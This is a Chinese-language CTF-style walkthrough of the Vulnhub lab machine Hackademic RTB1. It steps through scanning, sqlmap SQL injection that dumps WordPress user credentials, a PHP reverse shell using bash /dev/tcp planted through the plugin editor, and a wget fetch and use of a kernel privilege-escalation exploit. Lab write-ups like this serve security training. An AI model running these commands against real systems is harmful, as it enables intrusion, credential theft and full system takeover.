Vulnhub系列靶机-Hackadmeic.RTB1

来日可期x2023-09-18 20:16

文章目录

  • Vulnhub系列靶机-Hackadmeic.RTB1
    • [1. 信息收集](#1. 信息收集)
      • [1.1 主机扫描](#1.1 主机扫描)
      • [1.2 端口扫描](#1.2 端口扫描)
      • [1.3 目录爆破](#1.3 目录爆破)
    • [2. 漏洞探测](#2. 漏洞探测)
    • [3. 漏洞利用](#3. 漏洞利用)
      • [3.1 反弹Shell](#3.1 反弹Shell)
    • [4. 内核提权](#4. 内核提权)

Vulnhub系列靶机-Hackadmeic.RTB1

1. 信息收集

1.1 主机扫描

sh 复制代码 
arp-scan -l

1.2 端口扫描

sh 复制代码 
nmap -A -p- 192.168.188.184

扫描到了22端口和80端口,但是22端口的关闭的。

访问Web页面。

使用浏览器插件Wappalyzer扫描网站

看到WordPress,数据库是MySQL,语言是PHP。

根据首页中显示的内容,点击target

页面提示告诉我们要读取root目录下的Key.txt文件。

1.3 目录爆破

爆破/Hackademic_RTB1/网页目录

sh 复制代码 
dirsearch -u http://192.168.188.184/Hackademic_RTB1/ -e * -i 200

观察发现有一个登录页面wp-login.php。

2. 漏洞探测

在点击页面中能点击的链接的时候,发现点击Uncategorized的时候,链接变成了

复制代码 
http://192.168.188.184/Hackademic_RTB1/?cat=1

尝试是否存在SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞。

3. 漏洞利用

使用SqlMap工具进行SQL注入。

查看数据库

sh 复制代码 
sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" --dbs --batch

查看数据库中有哪些表

sh 复制代码 
sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -tables --batch

查看wp_users表中字段

sh 复制代码 
sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -T "wp_users" -columns --batch

这里我们只关注user_login和user_pass字段。

获取字段信息

sh 复制代码 
sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -T "wp_users" -columns -C "user_login,user_pass" -dump --batch

这里直接使用第三个用户名和密码进行登录,其他账户通过查看都没有什么可靠的信息。

发现在Plugins选项里有一个Plugin Editor编辑的地址。可以产生过添加反弹shell。

3.1 反弹Shell

php 复制代码 
system("bash -c 'sh -i &>/dev/tcp/192.168.188.157/8888 0>&1'");

kali中开启监听

sh 复制代码 
nc -lnvp 8888

提交之后,需要获取到上传的路径,才可以触发反弹shell。

之前我们使用网页插件扫描网页的时候得知了网站使用的是WordPress,Wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有上传的图片,视频和附件。

并且在爆破目录的时候发现有一个wp-content目录,尝试进行访问。(这里就存在目录遍历漏洞)

刚才我们编辑的页面是在Plugins选项中的Plugin Editor下的hello.php。点击pluguns进行查看。

点击hello.php后触发反弹shell

4. 内核提权

查看内核版本

sh 复制代码 
uname -a

搜索系统内核版本漏洞

sh 复制代码 
searchsploit 2.6.3 | grep "Local Privilege Escalation"

查看完整路径

sh 复制代码 
searchsploit -p linux/local/15285.c
复制代码 
/usr/share/exploitdb/exploits/linux/local/15285.c

将15285.c文件拷贝到桌面上,然后在桌面上开启一个http服务

sh 复制代码 
python3 -m http.server 9999

然后切换到tmp目录,执行wget命令下载该工具

sh 复制代码 
wget http://192.168.188.157:9999/15285.c

然后赋予该文件可执行权限

sh 复制代码 
chmod 777 15285.c

将15285.c进行预处理,汇编,编译,并链接形成可执行文件exp。-o选项用来指定输出文件的文件名

执行exp文件

查看key.txt文件。

相关推荐
独行soc6 小时前
2026年渗透测试面试题总结-18(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
ESBK20256 小时前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信
旺仔Sec7 小时前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
七牛云行业应用7 小时前
Moltbook一夜崩盘:150万密钥泄露背后的架构“死穴”与重构实战
网络安全·postgresql·架构·高并发·七牛云
浩浩测试一下7 小时前
内网---> WriteOwner权限滥用
网络·汇编·windows·安全·microsoft·系统安全
原来是你~呀~8 小时前
Strix:AI驱动的全自动安全测试平台,LinuxOS部署
网络安全·自动化渗透测试·strix
fendouweiqian8 小时前
AWS WAF(配合 CloudFront)基础防护配置:免费能做什么、要不要开日志、如何限制危险方法
网络安全·aws·cloudfront
Loo国昌8 小时前
【大模型应用开发】第六阶段:模型安全与可解释性
人工智能·深度学习·安全·transformer
乾元8 小时前
终端安全(EDR):用深度学习识别未知勒索软件
运维·人工智能·网络协议·安全·网络安全·自动化·安全架构
安科瑞刘鸿鹏178 小时前
高速路灯故障难定位?用 ASL600 实现精确单灯监测与维护预警
运维·网络·物联网·安全
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03使用 1panel面板 部署 php网站04OpenClaw Chrome扩展使用教程 - 浏览器中继控制05Linux下V2Ray安装配置指南06Vue-skills的中文文档07UV安装并设置国内源08让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南09Claude Code Skills 实用使用手册10一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示